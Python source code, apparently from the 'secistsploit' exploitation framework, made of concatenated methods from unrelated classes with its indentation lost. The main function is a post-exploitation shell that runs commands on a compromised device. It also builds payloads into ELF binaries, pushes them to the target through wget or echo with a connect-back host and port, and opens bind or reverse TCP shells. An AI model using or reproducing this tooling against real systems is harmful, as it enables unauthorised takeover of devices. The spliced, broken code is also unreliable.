def _show_encoders(self, *args, **kwargs):
if issubclass(self.current_module.__class__, BasePayload):
encoders = self.current_module.get_encoders()
if encoders:
headers = ("Encoder", "Name", "Description")
print_table(headers, *encoders, max_column_length=100)
return
print_error("No encoders available")
def command_options(self, *args, **kwargs):
target_names = ["lhost", "lport", "ssl", "rhost", "rport", "LHOST", "LPOST", "RHOST", "RPORT"]
target_opts = [opt for opt in self.current_module.options if opt in target_names]
module_opts = [opt for opt in self.current_module.options if opt not in target_opts]
headers = ("Name", "Current settings", "Description")
print_info("\nTarget options:")
print_table(headers, *self.get_opts(*target_opts))
if module_opts:
print_info("\nModule options:")
print_table(headers, *self.get_opts(*module_opts))
print_info()
def print_info(self):
headers = (color_blue("{} ({} dBm)").format(self.addr, self.rssi), "")
if self.connectable:
allow_connection = color_green(str(self.connectable))
else:
allow_connection = color_red(str(self.connectable))
data = [
("Vendor", self.vendor),
("Allow Connections", allow_connection),
]
for d in self.data:
data.append((d[0], d[1]))
print_table(headers, *data, max_column_length=70, extra_fill=3)
def shell(exploit, architecture="", method="", payloads=None, **params):
available_payloads = {}
payload = None
options = []
if architecture and method:
path = "secistsploit/modules/payloads/{}/".format(architecture)
# get all payloads for given architecture
all_payloads = [
f.split(".")[0] for f in listdir(path) if isfile(join(path, f))
and f.endswith(".py") and f != "__init__.py"
]
payload_path = path.replace("/", ".")
for p in all_payloads:
module = getattr(
importlib.import_module("{}{}".format(payload_path, p)),
'Payload')
# if method/arch is cmd then filter out payloads
if method is "cmd":
if getattr(module, "cmd") in payloads:
available_payloads[p] = module
else:
available_payloads[p] = module
print_info()
print_success(
"Welcome to cmd. Commands are sent to the target via the execute method."
)
print_status(
"For further exploitation use 'show payloads' and 'set payload <payload>' commands."
)
print_info()
while True:
while not printer_queue.empty():
pass
if payload is None:
cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
else:
cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(
payload._Payload__info__["name"])
cmd = input(cmd_str)
if cmd in ["quit", "exit"]:
return
elif cmd == "show payloads":
if not available_payloads:
print_error("There are no available payloads for this exploit")
continue
print_status("Available payloads:")
headers = ("Payload", "Name", "Description")
data = []
for p in available_payloads.keys():
data.append(
(p, available_payloads[p]._Payload__info__["name"],
available_payloads[p]._Payload__info__["description"]))
print_table(headers, *data)
elif cmd.startswith("set payload "):
if not available_payloads:
print_error("There are no available payloads for this exploit")
continue
c = cmd.split(" ")
if c[2] in available_payloads.keys():
payload = available_payloads[c[2]]()
options = []
for option in payload.exploit_attributes.keys():
if option not in ["output", "filepath"]:
options.append([
option,
getattr(payload, option),
payload.exploit_attributes[option][1]
])
if payload.handler == "bind_tcp":
options.append(
["rhost", exploit.target, "Target IP address"])
if method == "wget":
options.append(
["lhost", "", "Connect-back IP address for wget"])
options.append(
["lport", 4545, "Connect-back Port for wget"])
else:
print_error("Payload not available")
elif payload is not None:
if cmd == "show options":
headers = ("Name", "Current settings", "Description")
print_info('\nPayload Options:')
print_table(headers, *options)
print_info()
elif cmd.startswith("set "):
c = cmd.split(" ")
if len(c) != 3:
print_error("set <option> <value>")
else:
for option in options:
if option[0] == c[1]:
try:
setattr(payload, c[1], c[2])
except Exception:
print_error("Invalid value for {}".format(
c[1]))
break
option[1] = c[2]
print_info("{} => {}".format(c[1], c[2]))
elif cmd == "run":
data = payload.generate()
if method == "wget":
elf_binary = payload.generate_elf(data)
communication = Communication(exploit, elf_binary, options,
**params)
if communication.wget() is False:
print_error("Exploit failed to transfer payload")
continue
elif method == "echo":
elf_binary = payload.generate_elf(data)
communication = Communication(exploit, elf_binary, options,
**params)
communication.echo()
elif method == "cmd":
params["exec_binary"] = data
communication = Communication(exploit, "", options,
**params)
if payload.handler == "bind_tcp":
communication.bind_tcp()
elif payload.handler == "reverse_tcp":
communication.reverse_tcp()
elif cmd == "back":
payload = None
else:
print_status("Executing '{}' on the device...".format(cmd))
print_info(exploit.execute(cmd))
def print_services(self):
headers = ("Handles", "Service > Characteristics", "Properties", "Data")
services = self.enumerate_services()
if services:
print_table(headers, *services, max_column_length=70, extra_fill=3)